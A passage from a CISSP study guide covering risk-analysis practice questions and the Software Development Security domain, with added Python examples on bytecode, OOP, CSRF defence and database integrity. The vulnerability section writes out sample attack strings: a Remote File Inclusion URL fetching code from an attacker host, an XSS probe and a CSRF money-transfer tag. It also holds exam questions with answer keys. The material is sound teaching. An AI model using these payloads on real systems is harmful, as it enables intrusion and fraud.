The information security system and risk mitigation plan are researched during the initiation phase. The security of the system is assessed and documented during the security certification phase. The decision to accept the risk represented by the system is made and documented during the security accreditation phase. Finally, once accredited, the ongoing security of the system is verified during the continuous monitoring phase.

Summary of exam objectives

Information security governance assures that an organization has the correct information structure, leadership, and guidance. Governance helps assure that a company has the proper administrative controls to mitigate risk. Risk Analysis (RA) helps ensure that an organization properly identifies, analyzes, and mitigates risk. Accurately assessing risk and understanding terms such as Annualized Loss Expectancy, Total Cost of Ownership, and Return on Investment will not only help you in the exam but also help advance your information security career.

TOP FIVE TOUGHEST QUESTIONS

1. Which of the following would be an example of a policy statement?
A. Protect PII by hardening servers
B. Harden Windows 7 by first installing the pre-hardened OS image
C. You may create a strong password by choosing the first letter of each word in a sentence and mixing in numbers and symbols
D. Download the CI Security Windows benchmark and apply it
Use the following scenario to answer questions 2-4:
Your company sells Apple iPods online and has suffered many Denial of Service (DoS) attacks. Your company makes an average $20,000 profit per week, and a typical DoS attack lowers sales by 40%. You suffer seven DoS attacks on average per year. A DoS mitigation service is available for a subscription fee of $10,000 per month. You have tested this service and believe it will mitigate the attacks.
2. What is the Annual Rate of Occurrence in the above scenario?
A. $20,000
B. 40%
C. 7
D. $10,000
3. What is the Annualized Loss Expectancy (ALE) of lost iPod sales due to the DoS attacks?
A. $20,000
B. $8000
C. $84,000
D. $56,000
4. Is the DoS mitigation service a good investment?
A. Yes, it will pay for itself
B. Yes, $10,000 is less than the $56,000 Annualized Loss Expectancy
C. No, the annual Total Cost of Ownership is higher than the Annualized Loss Expectancy
D. No, the annual Total Cost of Ownership is lower than the Annualized Loss Expectancy
5. Which of the following describes a duty of the data owner?
A. Patch systems
B. Report suspicious activity
C. Ensure their files are backed up
D. Ensure data has proper security labels

ANSWERS
1. Correct answer and explanation: A. Answer A is correct; policy is high level and avoids technology specifics.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. B is a procedural statement. C is a guideline. D is a baseline.
2. Correct answer and explanation: C. Answer C is correct; the Annual Rate of Occurrence is the number of attacks in a year.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. $20,000 is the Asset Value (AV). Forty percent is the Exposure Factor (EF). $10,000 is the monthly cost of the DoS service (used to calculate TCO).
3. Correct answer and explanation: D. Answer D is correct; Annualized Loss Expectancy (ALE) is calculated by first calculating the Single Loss Expectancy (SLE), which is the Asset Value (AV, $20,000) times the Exposure Factor (EF, 40%). The SLE is $8000; multiply by the Annual Rate of Occurrence (ARO, 7) for an ALE of $56,000.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect. $20,000 is the Asset Value. $8000 is the Single Loss Expectancy.
4. Correct answer and explanation: C. Answer C is correct; the Total Cost of Ownership (TCO) of the DoS mitigation service is higher than the Annualized Loss Expectancy (ALE) of lost sales due to DoS attacks. This means it is less expensive to accept the risk of DoS attacks (or find a less expensive mitigation strategy).
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. A is incorrect: the TCO is higher, not lower. $10,000 is the monthly TCO; you must calculate yearly TCO to compare with the ALE. D is wrong: the annual TCO is higher, not lower.
5. Correct answer and explanation: D. Answer D is correct; the data owner ensures that data has proper security labels.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect. Custodians patch systems. Users should be aware and report suspicious activity. Ensuring files are backed up is a weaker answer for a data owner duty, used to confuse the data owner with the owner of the file on a discretionary access control system.

CHAPTER 4

Domain 4: Software Development Security

Abstract
This chapter introduces Domain 4 of the CISSP, Software Development Security. The most important aspects of this domain are related to managing the development of software and applications. Approaches to software development that attempt to reduce the likelihood of defects or flaws are a key topic in this domain. In particular, the Waterfall, Spiral, and Rapid Application Development (RAD) models of software development are considered. Another significant portion of this chapter is dedicated to understanding the principles of Object-Oriented Programming and Design. A basic discussion of several types of software vulnerabilities and the issues surrounding disclosure of the vulnerabilities are also a topic for this domain. Finally, databases, being a key component of many applications, are considered.

KEYWORDS
Database; Extreme Programming (XP); Object; Object-Oriented Programming; Procedural languages; Spiral Model; Systems Development Life Cycle; Waterfall Model

Exam Objectives in This Chapter

Programming Concepts
Application Development Methods
Object-Oriented Design and Programming
Software Vulnerabilities, Testing, and Assurance
Databases

Introduction
Software is everywhere: not only in our computers but also in our houses, our cars, and our medical devices, and all software programmers make mistakes. As software has grown in complexity, the number of mistakes has grown along with it.
Developing software that is robust and secure is critical: this chapter will show how to do that. We will cover programming fundamentals such as compiled versus interpreted languages, as well as procedural and Object-Oriented Programming languages. We will discuss application development models such as the Waterfall Model, Spiral Model, and Extreme Programming (XP) and others. We will describe common software vulnerabilities, ways to test for them, and maturity frameworks to assess the maturity of the programming process and provide ways to improve it.

PROGRAMMING CONCEPTS
Let us begin by understanding some cornerstone programming concepts. As computers have become more powerful and ubiquitous, the process and methods used to create computer software have grown and changed.
Machine code, source code, and assemblers

Machine code (also called machine language) is software that is executed directly by the CPU. Machine code is CPU-dependent; it is a series of 1s and 0s that translate to instructions that are understood by the CPU. Source code is computer programming language instructions that are written in text that must be translated into machine code before execution by the CPU.
Assembly language is a low-level computer programming language. Assembly language instructions are short mnemonics, such as ADD, SUB (subtract), and JMP (jump), that match to machine language instructions. An assembler converts assembly language into machine language. A disassembler attempts to convert machine language into assembly.
Compilers, interpreters, and bytecode

Compilers take source code, such as C or Basic, and compile it into machine code. Interpreted languages differ from compiled languages: interpreted code is compiled on the fly each time the program is run. Bytecode, such as Java bytecode, is also interpreted code. Bytecode exists as an intermediary form (converted from source code) but still must be converted into machine code before it may run on the CPU.
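The source code, bytecode and disassembly steps just described can be watched happening inside CPython itself, which compiles source text to bytecode and then interprets that bytecode. This is an added example, not code from the study guide; the sample function `add` and the helper names are my own. The `dis` module here plays the role the text gives a disassembler, turning bytecode back into mnemonics rather than machine code back into assembly.

```python
"""Source code -> bytecode -> interpreter, shown with CPython's own tools.

Added example, not from the study guide. `compile` produces a bytecode code
object (still not CPU instructions); `dis` disassembles it to mnemonics; the
interpreter executes it when the function is called.
"""
import dis
import types

# Constructed sample source: a two-line function that adds its arguments.
SOURCE = "def add(a, b):\n    return a + b\n"


def compile_source(src: str) -> types.CodeType:
    """Translate source text into a bytecode code object (no machine code yet)."""
    return compile(src, "<sample>", "exec")


def function_code(src: str, name: str) -> types.CodeType:
    """Run the module-level bytecode in a fresh namespace; return the named function's code."""
    namespace = {}
    exec(compile_source(src), namespace)
    return namespace[name].__code__


def disassemble(code: types.CodeType) -> list:
    """Mnemonics of each bytecode instruction, the way a disassembler lists opcodes."""
    return [instruction.opname for instruction in dis.get_instructions(code)]


def run_bytecode(code: types.CodeType, *args):
    """Wrap the code object in a function and let the interpreter execute it."""
    return types.FunctionType(code, {})(*args)


if __name__ == "__main__":
    code = function_code(SOURCE, "add")
    print("raw bytecode bytes:", code.co_code)   # the intermediary form
    print("disassembly:", disassemble(code))     # e.g. LOAD_FAST ... RETURN_VALUE
    print("interpreted result:", run_bytecode(code, 1, 2))
```

The exact opcode names vary between CPython versions, so the check to rely on is the presence of `RETURN_VALUE` and the interpreted result, not the full listing.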
Types of publicly released software

Once programmed, publicly released software may come in different forms (such as with or without the accompanying source code) and released under a variety of licenses.
Open and closed source software

Closed source software is software typically released in executable form: the source code is kept confidential. Open source software publishes source code publicly. Proprietary software is software that is subject to intellectual property protections such as patents or copyrights.
Free Software, Shareware, and Crippleware

Freeware is software which is free of charge to use. Shareware is fully functional proprietary software that may be initially used free of charge. If the user continues to use the Shareware for a specific period of time specified by the license (such as 30 days), the Shareware license typically requires payment. Crippleware is partially functioning proprietary software, often with key features disabled. The user is typically required to make a payment to unlock the full functionality.

APPLICATION DEVELOPMENT METHODS

As software has grown in complexity, software programming has increasingly become a team effort. Team-based projects require project management: providing a project framework with deliverables and milestones, divvying up tasks, team communication, progress evaluation and reporting, and (hopefully) a final delivered product.
Waterfall Model

The Waterfall Model is a linear application development model that uses rigid phases; when one phase ends, the next begins. Steps occur in sequence, and the unmodified Waterfall Model does not allow developers to go back to previous steps. It is called the waterfall because it simulates water falling: it cannot go back up. A modified Waterfall Model allows a return to a previous phase for verification or validation, ideally confined to connecting steps.
Spiral

The Spiral Model is a software development model designed to control risk. The Spiral Model repeats steps of a project, starting with modest goals and expanding outward in ever-wider spirals (called rounds). Each round of the spiral constitutes a project, and each round may follow traditional software development methodology such as modified waterfall. A risk analysis is performed each round. Fundamental flaws in the project or process are more likely to be discovered in the earlier phases, resulting in simpler fixes. This lowers the overall risk of the project: large risks should be identified and mitigated.
Agile Software Development

Agile Software Development evolved as a reaction to rigid software development models such as the Waterfall Model. Agile methods include Extreme Programming (XP). Agile embodies many modern development concepts, including more flexibility, fast turnaround with smaller milestones, strong communication within the team, and more customer involvement.
Extreme Programming

Extreme Programming (XP) is an Agile development method that uses pairs of programmers who work off a detailed specification. There is a high level of customer involvement and constant communication.
Rapid Application Development

Rapid Application Development (RAD) rapidly develops software via the use of prototypes, "dummy" GUIs, back-end databases, and more. The goal of RAD is quickly meeting the business need of the system; technical concerns are secondary. The customer is heavily involved in the process.
SDLC

The Systems Development Life Cycle (SDLC, also called the software development life cycle or simply the system life cycle) is a system development model. SDLC is used across the industry, but SDLC focuses on security when used in context of the exam. Think of "our" SDLC as the secure systems development life cycle: the security is implied.

Fast Facts
The following overview is summarized from NIST SP 800-14:[1]
Prepare a security plan: Ensure that security is considered during all phases of the IT system life cycle and that security activities are accomplished during each of the phases.
Initiation: The need for a system is expressed and the purpose of the system is documented.
Conduct a sensitivity assessment: Look at the security sensitivity of the system and the information to be processed.
Development/acquisition: The system is designed, purchased, programmed, or developed.
Determine security requirements: Determine technical features (like access controls), assurances (like background checks for system developers), or operational practices (like awareness and training).
Incorporate security requirements into specifications: Ensure that the previously gathered information is incorporated in the project plan.
Obtain the system and related security activities: May include developing the system's security features, monitoring the development process itself for security problems, responding to changes, and monitoring threats.
Implementation: The system is tested and installed.
Install/turn on controls: A system often comes with security features disabled. These need to be enabled and configured.
Security testing: Used to certify a system and may include testing security management, physical facilities, personnel, procedures, the use of commercial or in-house services (such as networking services), and contingency planning.
Accreditation: The formal authorization by the accrediting (management) official for system operation and an explicit acceptance of risk.
Operation/maintenance: The system is modified by the addition of hardware and software and by other events.
Security operations and administration: Examples include backups, training, managing cryptographic keys, user administration, and patching.
Operational assurance: Examines whether a system is operated according to its current security requirements.
Audits and monitoring: A system audit is a one-time or periodic event to evaluate security. Monitoring refers to an ongoing activity that examines either the system or the users.
Disposal: The secure decommission of a system.
Information: Information may be moved to another system, archived, discarded, or destroyed.
Media sanitization: There are three general methods of purging media: overwriting, degaussing (for magnetic media only), and destruction.

[1] Generally Accepted Principles and Practices for Securing Information Technology Systems. http://csrc.nist.gov/publications/nistpubs/800-14/800-14.pdf [accessed June 26, 2013].

OBJECT-ORIENTED PROGRAMMING
Object-Oriented Programming (OOP) uses an object metaphor to design and write computer programs. An object is a "black box" that is able to perform functions and sends and receives messages. Objects contain data and methods (the functions they perform). The object provides encapsulation (also called data hiding): we do not know, from the outside, how the object performs its function. This provides security benefits: users should not be exposed to unnecessary details.

Cornerstone Object-Oriented Programming concepts

Cornerstone Object-Oriented Programming concepts include objects, methods, messages, inheritance, delegation, polymorphism, and polyinstantiation. We will use an example object called "Addy" to illustrate the cornerstone concepts. Addy is an object that adds two integers; it is an extremely simple object, but has enough complexity to explain core OOP concepts. Addy inherits an understanding of numbers and math from his parent class (the class is called "mathematical operators"). One specific object is called an instance. Note that objects may inherit from other objects, in addition to classes.
In our case, the programmer simply needs to program Addy to support the method of addition (inheritance takes care of everything else Addy must know). Figure 4.1 shows Addy adding two numbers.

FIGURE 4.1 The Addy object.

"1 + 2" is the input message; "3" is the output message. Addy also supports delegation: if he does not know how to perform a requested function, he can delegate that request to another object (called "Subby" in Figure 4.2).

FIGURE 4.2 Delegation.

Addy also supports polymorphism (based on the Greek roots "poly" and "morph," meaning "many" and "forms," respectively): he has the ability to overload his plus (+) operator, performing different methods depending on the context of the input message. For example, Addy adds when the input message contains "number + number"; polymorphism allows Addy to concatenate two strings when the input message contains "string + string," as shown in Figure 4.3.

FIGURE 4.3 Polymorphism.

Finally, polyinstantiation involves multiple instances (specific objects) with the same names that contain different data. This may be used in multilevel secure environments to keep top secret and secret data separate, for example. Figure 4.4 shows polyinstantiated Addy objects: two objects with the same name but different data. Note that these are two separate objects. Also, to a secret-cleared subject, the Addy object with secret data is the only known Addy object.

Fast Facts
Here is a summary of Object-Oriented Programming concepts illustrated by Addy:
Object: Addy
Class: Mathematical operators
Method: Addition
Inheritance: Addy inherits an understanding of numbers and math from his parent class "mathematical operators." The programmer simply needs to program Addy to support the method of addition
Example input message: 1 + 2
Example output message: 3
Polymorphism: Addy can change behavior based on the context of the input, overloading the "+" to perform addition, or concatenation, depending on the context
Polyinstantiation: Two Addy objects (secret and top secret), with different data

FIGURE 4.4 Polyinstantiation.
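Addy and Subby as an added Python illustration (not the book's code) of the concepts just listed: inheritance from the "mathematical operators" class, the "+" message, delegation to Subby, polymorphism on number versus string input, and polyinstantiation keyed by a clearance label. Subby's subtraction method and the clearance labels are assumptions made for the example.

```python
# Added illustration of the Addy object (not the book's code).

class MathematicalOperators:
    """Parent class: the understanding of numbers and math that Addy inherits."""

    def is_number(self, value):
        return isinstance(value, (int, float)) and not isinstance(value, bool)


class Subby(MathematicalOperators):
    """A second object that knows how to subtract; Addy delegates to it.
    (Subby's subtraction is an assumption for this example.)"""

    def handle(self, left, op, right):
        if op == "-" and self.is_number(left) and self.is_number(right):
            return left - right
        raise ValueError("Subby cannot handle %r %s %r" % (left, op, right))


class Addy(MathematicalOperators):
    """Adds two integers; only the addition method had to be programmed."""

    def __init__(self, data=None, delegate=None):
        self.data = data            # payload used for the polyinstantiation demo
        self.delegate = delegate    # object that handles requests Addy cannot

    def add(self, left, right):
        # Polymorphism: the same "+" message behaves differently by context.
        if self.is_number(left) and self.is_number(right):
            return left + right                 # number + number -> addition
        if isinstance(left, str) and isinstance(right, str):
            return left + right                 # string + string -> concatenation
        raise TypeError("Addy cannot add %r and %r" % (left, right))

    def handle(self, left, op, right):
        """Process an input message such as (1, "+", 2); return the output message."""
        if op == "+":
            return self.add(left, right)
        # Delegation: pass a request Addy does not understand to another object.
        if self.delegate is not None:
            return self.delegate.handle(left, op, right)
        raise ValueError("no object can handle %r" % op)


# Polyinstantiation: two objects with the same name holding different data,
# kept separate by clearance level (labels are assumed for illustration).
_instances = {
    "secret": Addy(data="secret figures"),
    "top secret": Addy(data="top secret figures"),
}


def lookup_addy(clearance):
    """Return the only Addy instance a subject at this clearance knows about."""
    return _instances[clearance]


def demo():
    addy = Addy(delegate=Subby())
    return {
        "add": addy.handle(1, "+", 2),            # 3
        "concat": addy.handle("ab", "+", "cd"),   # "abcd"
        "delegated": addy.handle(5, "-", 3),      # 2, handled by Subby
        "secret_view": lookup_addy("secret").data,
        "ts_view": lookup_addy("top secret").data,
    }


if __name__ == "__main__":
    print(demo())
```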

Object Request Brokers

As we have seen previously, mature objects are designed to be reused: they lower risk and development costs. Object Request Brokers (ORBs) can be used to locate objects: they act as object search engines. ORBs are middleware: they connect programs to programs. Common object brokers include COM, DCOM, and CORBA.

COM and DCOM

Two object broker technologies by Microsoft are COM (Component Object Model) and DCOM (Distributed Component Object Model). COM locates objects on a local system; DCOM can also locate objects over a network.
COM allows objects written with different OOP languages to communicate, where objects written in C++ send messages to objects written in Java, for example. It is designed to hide the details of any individual object and focuses on the object's capabilities.
DCOM is a networked sequel to COM: "Microsoft Distributed COM (DCOM) extends the Component Object Model (COM) to support communication among objects on different computers on a LAN, a WAN, or even the Internet. With DCOM, your application can be distributed at locations that make the most sense to your customer and to the application." [2]
DCOM includes Object Linking and Embedding (OLE), a way to link documents to other documents.
Both COM and DCOM are being supplanted by Microsoft .NET, which can interoperate with DCOM but offers advanced functionality to both COM and DCOM.

SOFTWARE VULNERABILITIES, TESTING, AND ASSURANCE

Once the project is underway and software has been programmed, the next steps are testing the software, focusing on the confidentiality, integrity, and availability of the system, the application, and the data processed by the application. Special care must be given to the discovery of software vulnerabilities that could lead to data or system compromise. Finally, organizations need to be able to gauge the effectiveness of their software creation process and identify ways to improve it.

Software vulnerabilities

Programmers make mistakes: this has been true since the advent of computer programming. The number of average defects per line of software code can often be reduced, though not eliminated, by implementing mature software development practices.

Types of software vulnerabilities

This section will briefly describe common application vulnerabilities. An additional source of up-to-date vulnerabilities can be found at "2011 CWE/SANS Top 25 Most Dangerous Programming Errors," available at http://cwe.mitre.org/top25/ [3]; the following summary is based on this list. CWE refers to Common Weakness Enumeration, a dictionary of software vulnerabilities by MITRE (see http://cwe.mitre.org/). SANS is the SANS Institute; see http://www.sans.org.
Hard-coded credentials: Backdoor username/passwords left by programmers in production code
Buffer overflow: Occurs when a programmer does not perform variable bounds checking
SQL injection: Manipulation of a back-end SQL server via a front-end Web server
Directory path traversal: Escaping from the root of a Web server (such as /var/www) into the regular file system by referencing directories such as ../..
PHP Remote File Inclusion (RFI): Altering normal PHP URLs and variables such as "http://good.example.com?file=readme.txt" to include and execute remote content, such as "http://good.example.com?file=http://evil.example.com/bad.php"
Cross-Site Scripting (XSS): Third-party injection of a script into a Web page within the security context of a trusted site
Cross-Site Request Forgery (CSRF or sometimes XSRF): Third-party submission of predictable content to a Web application within the security context of an authenticated user

Cross-Site Scripting and Cross-Site Request Forgery

Cross-Site Scripting and Cross-Site Request Forgery are often confused. They are both Web attacks: the difference is XSS executes a script in a trusted context:

<script>alert('XSS Test!');</script>

The previous code would pop up a harmless "XSS Test!" alert. A real attack would include more JavaScript, often stealing cookies or authentication credentials.
CSRF often tricks a user into processing a URL (sometimes by embedding the URL in an HTML image tag) that performs a malicious act, for example, tricking a white hat into rendering the following image tag:

<img src="https://bank.example.com/transfer-money?from=WHITEHAT&to=BLACKHAT">
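The defender's side of both attacks, as an added Python example that is not the book's code: HTML-escaping user-supplied text neutralises the <script> probe shown above, and a per-session token rejects the forged transfer request. The session ids, the amount field and the server secret are constructed for the example.

```python
# Added defender-side illustration (not the book's code) of the two web attacks
# above: output encoding against XSS and a session-bound token against CSRF.
import hashlib
import hmac
import html
import secrets

# Constructed sample inputs: the book's XSS probe and a forged transfer request.
XSS_PROBE = "<script>alert('XSS Test!');</script>"
FORGED_REQUEST = {"from": "WHITEHAT", "to": "BLACKHAT", "amount": "1000"}


def render_comment(user_text):
    """Return the HTML fragment a page shows for user-supplied text.

    Reflecting user_text unescaped would be the XSS bug; html.escape turns the
    angle brackets and quotes into entities, so the browser renders the text
    literally instead of executing it.
    """
    return '<p class="comment">' + html.escape(user_text, quote=True) + "</p>"


class CsrfGuard:
    """Issue and verify anti-CSRF tokens bound to a session.

    The token is an HMAC of the session id under a server-side secret. A third
    party who can make the victim's browser send a request (for example via an
    <img> tag) still cannot supply a valid token: the browser attaches the
    session cookie automatically, but not a value that lives in page content.
    """

    def __init__(self, server_secret=None):
        self.server_secret = server_secret or secrets.token_bytes(32)

    def token_for(self, session_id):
        return hmac.new(self.server_secret, session_id.encode(), hashlib.sha256).hexdigest()

    def request_allowed(self, session_id, form_fields):
        supplied = form_fields.get("csrf_token", "")
        # Constant-time compare avoids leaking the token byte by byte.
        return hmac.compare_digest(supplied, self.token_for(session_id))


def transfer_money(guard, session_id, form_fields):
    """State-changing endpoint: refuse unless the CSRF token matches the session."""
    if not guard.request_allowed(session_id, form_fields):
        return "rejected: missing or invalid CSRF token"
    return "transferred %s from %s to %s" % (
        form_fields["amount"], form_fields["from"], form_fields["to"])


if __name__ == "__main__":
    print(render_comment(XSS_PROBE))
    guard = CsrfGuard()
    sid = "session-of-whitehat"      # constructed session id
    print(transfer_money(guard, sid, FORGED_REQUEST))          # rejected
    legit = dict(FORGED_REQUEST, csrf_token=guard.token_for(sid))
    print(transfer_money(guard, sid, legit))                   # accepted
```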
Privilege escalation

Privilege escalation vulnerabilities allow an attacker with (typically limited) access to be able to access additional resources. Improper software configurations and poor coding and testing practices often cause privilege escalation vulnerabilities.

Backdoors

Backdoors are shortcuts in a system that allow a user to bypass security checks (such as username/password authentication). Attackers will often install a backdoor after compromising a system.

Disclosure

Disclosure describes the actions taken by a security researcher after discovering a software vulnerability. Full disclosure is the controversial practice of releasing vulnerability details publicly. Responsible disclosure is the practice of privately sharing vulnerability information with a vendor and withholding public release until a patch is available. Other options exist between full and responsible disclosure.

Software Capability Maturity Model

The Software Capability Maturity Model (CMM) is a maturity framework for evaluating and improving the software development process. Carnegie Mellon University's (CMU) Software Engineering Institute (SEI) developed the model. The goal of CMM is to develop a methodical framework for creating quality software that allows measurable and repeatable results.

Fast Facts
The five levels of CMM are described (see http://www.sei.cmu.edu/reports/93tr024.pdf) [4]:
1. Initial: The software process is characterized as ad hoc and occasionally even chaotic. Few processes are defined, and success depends on individual effort.
2. Repeatable: Basic project management processes are established to track cost, schedule, and functionality. The necessary process discipline is in place to repeat earlier successes on projects with similar applications.
3. Defined: The software process for both management and engineering activities is documented, standardized, and integrated into a standard software process for the organization. Projects use an approved, tailored version of the organization's standard software process for developing and maintaining software.
4. Managed: Detailed measures of the software process and product quality are collected, analyzed, and used to control the process. Both the software process and products are quantitatively understood and controlled.
5. Optimizing: Continual process improvement is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies.

4 Capability Maturity Model(SM) for Software, Version 1.1. http://www.sei.cmu.edu/reports/93tr024.pdf [accessed June 26, 2013].

DATABASES
A database is a structured collection of related data. Databases allow queries (searches), insertions (updates), deletions, and many other functions. The database is managed by the Database Management System (DBMS), which controls all access to the database and enforces the database security. Databases are managed by Database Administrators (DBAs). Databases may be searched with a database query language, such as the Structured Query Language (SQL). Typical database security issues include the confidentiality and integrity of the stored data. Integrity is a primary concern when replicated databases are updated.

Relational databases

The most common modern database is the relational database, which contains two-dimensional tables of related (hence the term "relational") data. A table is also called a relation. Tables have rows and columns: a row is a database record, called a tuple; a column is called an attribute. A single cell (intersection of a row and column) in a database is called a value. Relational databases require a unique value called the primary key in each tuple in a table. Table 4.1 shows a relational database employee table, sorted by the primary key (SSN or Social Security Number).

Table 4.1
Relational Database Employee Table

Table 4.1 attributes are SSN, Name, and Title. Tuples include each row: 133-73-1337, 343-53-4334, etc. "Gaff" is an example of a value (cell). Candidate keys are any attribute (column) in the table with unique values: candidate keys in the previous table include SSN and Name; SSN was selected as the primary key because it is truly unique (two employees could have the same name, but not the same SSN). The primary key may join two tables in a relational database.

Foreign keys

A foreign key is a key in a related database table that matches a primary key in the parent database. Note that the foreign key is the local table's primary key: it is called the foreign key when referring to a parent table. Table 4.2 is the HR database table that lists employees' vacation time (in days) and sick time (also in days); it has a foreign key of SSN. The HR database table may be joined to the parent (employee) database table by connecting the foreign key of the HR table to the primary key of the employee table.

Table 4.2
HR Database Table

Referential, semantic, and entity integrity

Databases must ensure the integrity of the data in the tables: this is called data integrity, discussed in the section "Database integrity." There are three additional specific integrity issues that must be addressed beyond the correctness of the data itself: referential, semantic, and entity integrity. These are tied closely to the logical operations of the DBMS.

Crunch Time
Referential integrity means that every foreign key in a secondary table matches a primary key in the parent table: if this is not true, referential integrity has been broken. Semantic integrity means that each attribute (column) value is consistent with the attribute data type. Entity integrity means each tuple has a unique primary key that is not null.

The HR database table shown in Table 4.2, seen previously, has referential, semantic, and entity integrity. Table 4.3, on the other hand, has multiple problems: one tuple violates referential integrity, one tuple violates semantic integrity, and the last two tuples violate entity integrity.

Table 4.3
Database Table Lacking Integrity

The tuple with the foreign key 467-51-9732 has no matching entry in the employee database table. This breaks referential integrity: there is no way to link this entry to a name or title. Cell "Nexus 6" violates semantic integrity: the sick time attribute requires values of days, and "Nexus 6" is not a valid amount of sick days. Finally, the last two tuples both have the same primary key (primary to this table; foreign key to the parent employees table); this breaks entity integrity.

Database normalization

Database normalization seeks to make the data in a database table logically concise, organized, and consistent. Normalization removes redundant data and improves the integrity and availability of the database.

Database views

Database tables may be queried; the results of a query are called a database view. Views may be used to provide a constrained user interface: for example, non-management employees can be shown their individual records only via database views. Table 4.4 shows the database view resulting from querying the employee table Title attribute with a string of "Detective." While employees of the HR department may be able to view the entire employee table, this view may be authorized for the captain of the detectives, for example.

Table 4.4
Employee Table Database View "Detective"
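The three integrity rules and the "Detective" view, as an added Python/SQLite example that is not the book's code: it declares the employee and HR tables with constraints, replays the three defects of Table 4.3 and shows the DBMS rejecting each, then reproduces the Table 4.4 view with a parameterised query so that the title value cannot alter the SQL. Employee names other than Gaff, the extra SSN and the day counts are constructed sample data.

```python
# Added example (not the book's code): the employee and HR tables in SQLite,
# with the DBMS enforcing referential, semantic and entity integrity.
import sqlite3

DDL = """
CREATE TABLE employee (
    ssn   TEXT PRIMARY KEY NOT NULL,            -- entity integrity: unique, not null
    name  TEXT NOT NULL,
    title TEXT NOT NULL
);
CREATE TABLE hr (
    ssn           TEXT PRIMARY KEY NOT NULL,    -- primary key here, foreign key to employee
    vacation_days INTEGER NOT NULL
        CHECK (typeof(vacation_days) = 'integer' AND vacation_days >= 0),
    sick_days     INTEGER NOT NULL              -- semantic integrity: a number of days
        CHECK (typeof(sick_days) = 'integer' AND sick_days >= 0),
    FOREIGN KEY (ssn) REFERENCES employee(ssn)  -- referential integrity
);
"""

EMPLOYEES = [  # constructed rows in the shape of Table 4.1
    ("133-73-1337", "Deckard", "Detective"),
    ("343-53-4334", "Gaff", "Detective"),
    ("425-22-8422", "Bryant", "Captain"),
]


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")   # SQLite ignores FKs unless enabled
    conn.executescript(DDL)
    conn.executemany("INSERT INTO employee VALUES (?, ?, ?)", EMPLOYEES)
    conn.execute("INSERT INTO hr VALUES (?, ?, ?)", ("133-73-1337", 10, 2))
    conn.commit()
    return conn


def try_insert_hr(conn, row):
    """Attempt an HR insert; return None on success or the integrity error text."""
    try:
        conn.execute("INSERT INTO hr VALUES (?, ?, ?)", row)
        conn.commit()
        return None
    except sqlite3.IntegrityError as err:
        conn.rollback()
        return str(err)


def integrity_report(conn):
    """Replay the three defects of Table 4.3 against the constrained schema."""
    return {
        # no such employee: referential integrity
        "referential": try_insert_hr(conn, ("467-51-9732", 5, 1)),
        # "Nexus 6" is not a number of days: semantic integrity
        "semantic": try_insert_hr(conn, ("343-53-4334", 5, "Nexus 6")),
        # duplicate primary key: entity integrity
        "entity": try_insert_hr(conn, ("133-73-1337", 3, 3)),
    }


def detective_view(conn, title):
    """Table 4.4: the rows a captain of detectives may see.

    The title is bound as a parameter, so a value such as "Detective' OR '1'='1"
    is matched literally instead of changing the query (the SQL injection defence).
    """
    return conn.execute(
        "SELECT ssn, name, title FROM employee WHERE title = ? ORDER BY ssn",
        (title,),
    ).fetchall()


if __name__ == "__main__":
    db = open_db()
    for kind, msg in integrity_report(db).items():
        print("%-12s -> %s" % (kind, msg))
    print(detective_view(db, "Detective"))
    print(detective_view(db, "Detective' OR '1'='1"))   # no rows: nothing has that title
```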

Database query languages

Database query languages allow the creation of database tables, read/write access to those tables, and many other functions. Database query languages have at least two subsets of commands: Data Definition Language (DDL) and Data Manipulation Language (DML). DDL is used to create, modify, and delete tables. DML is used to query and update data stored in the tables.

Database integrity

In addition to the previously discussed relational database integrity issues of semantic, referential, and entity integrity, databases must also ensure data integrity: the integrity of the entries in the database tables. This treats integrity as a more general issue: mitigating unauthorized modifications of data. The primary challenge associated with data integrity within a database is simultaneous attempted modifications of data. A database server typically runs multiple threads (lightweight processes), each capable of altering data. What happens if two threads attempt to alter the same record?
DBMSs may attempt to commit updates: make the pending changes permanent. If the commit is unsuccessful, the DBMSs can rollback (also called abort) and restore from a savepoint (clean snapshot of the database tables).
A database journal is a log of all database transactions. Should a database become corrupted, the database can be reverted to a backup copy, and then, subsequent transactions can be replayed from the journal, restoring database integrity.

Database replication and shadowing

Databases may be highly available (HA), replicated with multiple servers containing multiple copies of tables. Integrity is the primary concern with replicated databases.
Database replication mirrors a live database, allowing simultaneous reads and writes to multiple replicated databases by clients. Replicated databases pose additional integrity challenges. A two-phase (or multi-phase) commit can be used to assure integrity.
A shadow database is similar to a replicated database, with one key difference: a shadow database mirrors all changes made to a primary database, but clients do not access the shadow. Unlike replicated databases, the shadow database is one-way.

Summary of exam objectives

We live in an increasingly computerized world, and software is everywhere. The confidentiality, integrity, and availability of data processed by software are critical, as is the normal functionality (availability) of the software itself. This domain has shown how software works and the challenges programmers face while trying to write error-free code that is able to protect data (and itself) in the face of attacks.
We have seen that following a software development maturity model such as the Capability Maturity Model (CMM) can dramatically lower the number of errors programmers make. The five steps of CMM follow the process most programming organizations follow, from an informal process to a mature process that always seeks improvement: initial, repeatable, defined, managed, and optimizing.

TOP FIVE TOUGHEST QUESTIONS

1. What software design methodology uses paired programmers?
A. Agile
B. Extreme Programming (XP)
C. Sashimi
D. Scrum

2. An object acts differently, depending on the context of the input message. What Object-Oriented Programming concept does this illustrate?
A. Delegation
B. Inheritance
C. Polyinstantiation
D. Polymorphism

3. What type of database language is used to create, modify, and delete tables?
A. Data Definition Language (DDL)
B. Data Manipulation Language (DML)
C. Database Management System (DBMS)
D. Structured Query Language (SQL)

4. A database contains an entry with an empty primary key. What database concept has been violated?
A. Entity integrity
B. Normalization
C. Referential integrity
D. Semantic integrity

5. Which vulnerability allows a third party to redirect predictable content within the security context of an authenticated user?
A. Cross-Site Request Forgery (CSRF)
B. Cross-Site Scripting (XSS)
C. PHP Remote File Inclusion (RFI)
D. SQL Injection

SELF-TEST QUICK ANSWER KEY

1. Correct answer and explanation: B. Answer B is correct; Extreme Programming (XP) is an Agile development method that uses pairs of programmers who work off a detailed specification. There is a high level of customer involvement.
